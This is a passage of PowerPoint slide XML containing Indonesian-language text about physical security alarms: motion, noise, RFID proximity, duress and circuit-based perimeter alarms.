              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangkauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Sensor pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pantulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> radio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelombang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> radar) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inframerah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PIR), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kebisingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikrofon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AI dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>positif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kedekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tag dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> radio (RFID) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pergerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Paksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>liontin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersembunyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan handset DECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprogram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperingatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di perimeter dan di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jendela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
